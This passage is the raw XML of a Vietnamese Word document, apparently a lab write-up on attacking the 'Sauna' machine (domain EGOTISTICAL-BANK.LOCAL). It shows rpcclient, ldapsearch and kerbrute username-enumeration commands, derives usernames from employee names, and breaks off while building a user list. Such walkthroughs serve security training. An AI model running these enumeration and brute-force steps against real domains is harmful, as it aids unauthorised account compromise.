    <w:p w14:paraId="518BE41A" w14:textId="74D76B8B" w:rsidR="0061181E" w:rsidRDefault="0061181E" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="36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>Kiểm tra đăng nhập được với anonymous login không bằng rpcclient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D0B72B" w14:textId="7901B50E" w:rsidR="00CD3F05" w:rsidRDefault="00CD3F05" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD3F05">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05C20EB9" wp14:editId="7C880A4A">
            <wp:extent cx="2771010" cy="420992"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="Picture 14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black background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3125" cy="42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82D8" w14:textId="79BACB57" w:rsidR="00CD3F05" w:rsidRDefault="00CD3F05" w:rsidP="0061181E">
      <w:pPr>
        <w:ind w:left="36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>Không đăng nhập được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E17C451" w14:textId="22E1E1A3" w:rsidR="008A165C" w:rsidRDefault="008A165C" w:rsidP="00984A38">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A165C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59533EE6" wp14:editId="305D2D41">
            <wp:extent cx="3359970" cy="2219683"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="22" name="Picture 2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2857" cy="222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E7CE" w14:textId="0146824C" w:rsidR="008A165C" w:rsidRPr="008A165C" w:rsidRDefault="008A165C" w:rsidP="00984A38">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A165C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Chạy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> lệnh để xem thông tin về domain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7991FB" w14:textId="09016086" w:rsidR="008A165C" w:rsidRDefault="008A165C" w:rsidP="00984A38">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A165C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>ldapsearch -x -H ldap://10.129.95.180 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E0B007" w14:textId="581EACB3" w:rsidR="008A165C" w:rsidRDefault="008A165C" w:rsidP="00984A38">
      <w:pPr>
        <w:ind w:left="36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 xml:space="preserve">Không chứa thông tin gì đặc </w:t>
      </w:r>
      <w:r w:rsidR="00984A38">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>biệt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8C3283" w14:textId="6981D70F" w:rsidR="001E7B37" w:rsidRPr="001E7B37" w:rsidRDefault="001E7B37" w:rsidP="001E7B37">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc152522884"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="0F496CDC" w14:textId="1CF95415" w:rsidR="001E7B37" w:rsidRDefault="001E7B37" w:rsidP="00B635B2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 w:rsidRPr="001E7B37">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D9D7512" wp14:editId="7999D124">
            <wp:extent cx="3244216" cy="947748"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="23" name="Picture 23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computer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4198" cy="96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62CD" w14:textId="2480DFBE" w:rsidR="00984A38" w:rsidRDefault="00984A38" w:rsidP="00B635B2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>Không thu thập được thông tin gì đặc biệt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471E25CD" w14:textId="24F618FD" w:rsidR="00DF6E3D" w:rsidRPr="001313AB" w:rsidRDefault="00DF6E3D" w:rsidP="00DF6E3D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc152522885"/>
      <w:r w:rsidRPr="001313AB">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Kuberos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="5E2B8870" w14:textId="2817B096" w:rsidR="00DF6E3D" w:rsidRDefault="008E7865" w:rsidP="00B635B2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hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="002E4EBA" w:rsidRPr="00D60B5B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:lang w:val="vi-VN"/>
          </w:rPr>
          <w:t>https://github.com/ropnop/kerbrute</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58C93EF9" w14:textId="131A2F43" w:rsidR="00920E7C" w:rsidRDefault="002E4EBA" w:rsidP="00B635B2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 xml:space="preserve">Dùng tool này để brute force </w:t>
      </w:r>
      <w:r w:rsidR="00D867A3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>account. Chạy lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3D8BCE" w14:textId="4107CB84" w:rsidR="00D867A3" w:rsidRDefault="00D867A3" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D867A3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>./kerbrute userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.129.95.180</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63174FDB" w14:textId="15225A14" w:rsidR="009A740C" w:rsidRDefault="009A740C" w:rsidP="00B635B2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 w:rsidRPr="009A740C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36465DFD" wp14:editId="06E5FAAF">
            <wp:extent cx="4446270" cy="1692347"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175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1580" cy="169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61E4" w14:textId="39248A25" w:rsidR="009A740C" w:rsidRDefault="009A740C" w:rsidP="00B635B2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 xml:space="preserve">Ta thu được các </w:t>
      </w:r>
      <w:r w:rsidR="002E72C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>account:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3C8A9A" w14:textId="77777777" w:rsidR="002E72C8" w:rsidRPr="002E72C8" w:rsidRDefault="002E72C8" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E72C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>administrator@EGOTISTICAL-BANK.LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269E11E2" w14:textId="77777777" w:rsidR="002E72C8" w:rsidRPr="002E72C8" w:rsidRDefault="002E72C8" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E72C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>hsmith@EGOTISTICAL-BANK.LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1920E013" w14:textId="77777777" w:rsidR="002E72C8" w:rsidRPr="002E72C8" w:rsidRDefault="002E72C8" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E72C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Administrator@EGOTISTICAL-BANK.LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D40EBA2" w14:textId="77777777" w:rsidR="002E72C8" w:rsidRPr="002E72C8" w:rsidRDefault="002E72C8" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E72C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>fsmith@EGOTISTICAL-BANK.LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D48089" w14:textId="5E9C5834" w:rsidR="002E72C8" w:rsidRDefault="002E72C8" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E72C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Fsmith@EGOTISTICAL-BANK.LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A4F569" w14:textId="470E282B" w:rsidR="00D01A17" w:rsidRDefault="00D01A17" w:rsidP="00B635B2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 xml:space="preserve">Fsmith là account nhân viên </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Fergus </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Smith.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081DADF8" w14:textId="6D7064C1" w:rsidR="00D01A17" w:rsidRDefault="00D01A17" w:rsidP="00B635B2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="144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 xml:space="preserve">Cách đặt tên là chữ cái đầu của họ + viết thường của tên + </w:t>
      </w:r>
      <w:r w:rsidRPr="00D01A17">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>@EGOTISTICAL-BANK.LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BFB303" w14:textId="795D869E" w:rsidR="00D01A17" w:rsidRDefault="00D01A17" w:rsidP="00B635B2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="144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 xml:space="preserve">Vd: </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="001C6178">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:lang w:val="vi-VN"/>
          </w:rPr>
          <w:t>fsmith@EGOTISTICAL-BANK.LOCAL</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="45985368" w14:textId="0ACCD614" w:rsidR="00D01A17" w:rsidRDefault="00D01A17" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="144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>Shaun Coins</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; Scoins</w:t>
      </w:r>
      <w:r w:rsidRPr="00D01A17">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>@EGOTISTICAL-BANK.LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAA3562" w14:textId="695A6B82" w:rsidR="00D01A17" w:rsidRDefault="00D01A17" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="144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>Sophie Driver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; Sdriver</w:t>
      </w:r>
      <w:r w:rsidRPr="00D01A17">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>@EGOTISTICAL-BANK.LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F54ADD" w14:textId="22697784" w:rsidR="00D01A17" w:rsidRDefault="00D01A17" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="144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>Hugo Bear</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; Hbear</w:t>
      </w:r>
      <w:r w:rsidRPr="00D01A17">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>@EGOTISTICAL-BANK.LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E45C9F1" w14:textId="1FEBED32" w:rsidR="00D01A17" w:rsidRDefault="00D01A17" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="144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>Bowie Taylor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; Btaylor</w:t>
      </w:r>
      <w:r w:rsidRPr="00D01A17">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>@EGOTISTICAL-BANK.LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CFA95C" w14:textId="715F6C8B" w:rsidR="000A738A" w:rsidRDefault="00D01A17" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="144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>Steven Kerb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; Skerb</w:t>
      </w:r>
      <w:r w:rsidRPr="00D01A17">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>@EGOTISTICAL-BANK.LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D3F3A0" w14:textId="035B5951" w:rsidR="000A738A" w:rsidRDefault="000A738A" w:rsidP="00B635B2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>Chỉ có mỗi user fsmith tồn  tại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627E3CD5" w14:textId="77777777" w:rsidR="00B65F65" w:rsidRDefault="00B65F65" w:rsidP="00B635B2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</w:p>
    <w:p w14:paraId="1418BF23" w14:textId="74BC8E5F" w:rsidR="00C716FD" w:rsidRDefault="00C716FD" w:rsidP="00B635B2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>Lưu các user lại thành một file để tiện sử dụng gồm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432FD873" w14:textId="7BC3B3F6" w:rsidR="00C716FD" w:rsidRPr="00C716FD" w:rsidRDefault="00C716FD" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="144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>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00C716FD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>dministrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8F96AF" w14:textId="77777777" w:rsidR="00C716FD" w:rsidRPr="00C716FD" w:rsidRDefault="00C716FD" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C716FD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>hsmith</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2894886C" w14:textId="77777777" w:rsidR="00C716FD" w:rsidRPr="00C716FD" w:rsidRDefault="00C716FD" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C716FD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654270B2" w14:textId="77777777" w:rsidR="00C716FD" w:rsidRPr="00C716FD" w:rsidRDefault="00C716FD" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C716FD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>fsmith</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EA5839" w14:textId="77777777" w:rsidR="00C716FD" w:rsidRPr="00C716FD" w:rsidRDefault="00C716FD" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C716FD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Fsmith</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79474A56" w14:textId="77777777" w:rsidR="00C716FD" w:rsidRPr="00C716FD" w:rsidRDefault="00C716FD" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C716FD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>sauna</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFBB7F5" w14:textId="77777777" w:rsidR="00C716FD" w:rsidRPr="00C716FD" w:rsidRDefault="00C716FD" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C716FD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>administrator@EGOTISTICAL-BANK.LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CD0F70" w14:textId="77777777" w:rsidR="00C716FD" w:rsidRPr="00C716FD" w:rsidRDefault="00C716FD" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C716FD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>hsmith@EGOTISTICAL-BANK.LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD628EF" w14:textId="77777777" w:rsidR="00C716FD" w:rsidRPr="00C716FD" w:rsidRDefault="00C716FD" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C716FD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Administrator@EGOTISTICAL-BANK.LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ED2C37" w14:textId="77777777" w:rsidR="00C716FD" w:rsidRPr="00C716FD" w:rsidRDefault="00C716FD" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
